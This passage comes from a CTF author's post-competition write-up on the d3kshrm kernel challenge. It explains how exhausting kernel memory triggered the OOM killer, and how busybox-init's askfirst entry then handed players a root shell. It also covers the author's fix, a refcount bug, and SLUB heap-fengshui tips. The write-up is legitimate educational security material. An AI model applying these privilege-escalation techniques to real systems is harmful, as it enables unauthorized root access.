ALL OF THEM ARE KILLED for reclaiming the memory! But why? An important reason is that after killing one specific victim process, there may still not be enough spare memory to be allocated. This may due to the asynchronous memory reclaiming, memory fragments and so on. What is more is that we are keeping doing the memory allocation. Therefore the OOM killer was invoked for multiple times (even if in one allocation procedure), killed the sh and rcS according to its high oom_score and orderd by privilege, and finally killed the exploit in the end.

What will happen if all these processes are killed? As the ttyS0 was occupied by these processes and finally get free at the moment, the init will re-get its control and detect that it’s free now. Note that our initialization system is using the busybox-init, as we can see that the /sbin/init is a symbol link to the busybox. The busybox-init will use the /etc/inittab as its configuration file, so let’s see what I’ve written in this file at a very long time ago, which is referred to the official example from the busybox:

::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

Let’s take a look at ::askfirst: option whose value points to the /bin/ash. What is that and in what condition it will be executed? When there is no process running on the TTY, the program specified by the askfirst option will be executed by the /sbin/init with root privilege (just like getty).

Therefore we can get to know the reason why we can get a root shell: At the very beginning the /etc/init.d/rcS is running on the ttyS0 and spawn a user shell for us to interact. When we try to do the unlimited memory allocation in kernel space to occupy almost all the free memory, the OOM Killer will be waken up to kill the /etc/init.d/rcS . As there is no process running on the ttyS0, the /bin/ash specified by ::askfirst: in will be executed to provide us with a root shell.

That is also how Qanux from W&M solved the d3kshrm by accident: he just do the memory allocation directly from functionalities provided by the d3kshrm.ko , and due to my misconfiguration and wrong design, the expected allocatable memory is much larger than the memory of the virtual machine. Therefore the OOM killer was waken multiple times to kill all the user land processes except for init. After that the ttyS0 goes idle again the busybox-init just throw a root shell out directly to the ttyS0 he used.

Hence, here comes another question: Can we just simply do the memory allocation directly instead of directly exploit the memory-allocation APIs in the kernel? The answer is almost definitely NO. An important reason is that if we allocate memory directly into our process (like doing tons of malloc() to expand your heap segment), our OOM score will grow as well, and we will always be the first one to be killed. As we were killed, the memory allocation will stop and no need to invoke OOM killer to kill anyone else.

When I got this report during the competition, I quickly realized that this must be caused by the OOM killer after reviewing pictures provided by the player. What I didn’t expect is that everyone including the rcS will be killed as it never happened in any of CTF challenges I made before. My old expectation is that the kernel will panic due to the OOM, and the result told me that kernel does not always panic (lol the kernel is afraid of dying as well?). The report from the player who discovered this unintended solution says that his successful rate is at least 30%. However, the POC I wrote above is beyond 99%, I think this may be caused by the different API we called. As the packet_set_ring() calls the vzalloc_noprof(), it does only requires the kernel to allocate the memory region that is continuous only required on the virtual memory, which means that it can split the memory allocation from high-order one to low-order ones. However the function in d3kshrm.ko just calls the alloc_pages() to allocate high-order memory directly, thus the kernel will be more easy to get panic as we may not be able to reclaim required continuous high-order physical memory.

How I finally fix that? I create a revenge version of this challenge, with the /etc/inittab modified. I changed the ::askfirst: from /bin/ash to /sbin/poweroff to fix this unexpected vulnerability temporarily. But I think a better version might be changing that to the login ? Anyway this had taught me a lesson: a well-crafted environment might not be the most suitable one, and I should always double check everything in the environment.

What’s more…

The introduction and the flag is modified from one of my favourite advertisement created by the Halo Top. Although this video might just be created for fun, but it does give me some special feelings that I can’t describe simply with words. So I chose that as the base and modified a lot to give you some meaningless sentences as the introduction and the flag : )

My innovation of creating this challenge comes from the CVE-2023-2008 whose vulnerability is also the out-of-bound memory mapping. So to be honest it is not a pwn challenge that is hard and creative enough as my expectation and I’m so sorry about that because I’m always wanting to show you something cool and hadn’t present anything that is really cool this time.

An important reason why I chose to modified an existed vulnerability is that I did not have too much time on completing these challenges. As I’ve graduated from my undergraduate, I did not pay too much attention on how my junior schoolmates prepared for this year’s D^3CTF, and get to know that almost no pwn challenges were created just at about 10 days before the competition started . Therefore I have to stand out to rush to create the pwn challenges with almost nothing new in research in my mind to make sure the competition can be held normally as past years. Sorry and I apologize that I didn’t bring something that is as same cool as the d3kcache in 2023.

And if you pay enough attention to the kernel module itself, you may notice that I’ve wrote another unexpected vulnerability in calculating the reference count of the vm_area: I FORGOT TO WRITE THE vm_open() TO ADD COUNT BUT HAD REMEMBER TO WRITE THE vm_close() TO DEC COUNT! This had made confusion for many of players and made them waste lots of time on trying to exploit that, and to be honest it’s not easy to exploit as the page is hard to be use as both the user-land mapping page and SLUB page (but if you’re interested enough, maybe you can check for the CVE-2024-0582 which is in a similar situation, but I’m not sure whether it also works for the d3kshrm so good luck). I’m sincerely sorry about that because this challenge is also a rush-made one so I didn’t check that too well.

For the whole competition, only the player Tplus from the MNGA team had solved that with the expected solution. CONGRATULATIONS FOR HIM WHO IS THE ONLY ONE SOLVE THAT DURING THE COMPETITION! And Qanux from W&M also succeeded to exploit that with expected solution after the competition ended (because he didn’t predict the -revenge version would be created for fixing and went out for a big big meal after solved with unintended solution). Anyway I think we should all clap and cheer for them.

And another interesting point all of you may ignore is that new SLUB pages will be allocated during the kmem_cache is being created, which means that our heap fengshui will always need to be focusing on the NEXT NEW ALLOCATED SLUB PAGES. I think that is the core reason why both Tplus and Qanux have a low successful rate in their exploitation as this key point is missing: they’re focusing on the first SLUB while my official solution is focusing on the second one. Therefore my successful rate to exploit with page-level heap fengshui is beyond 80% and almost no need to try multiple times while attacking the remote.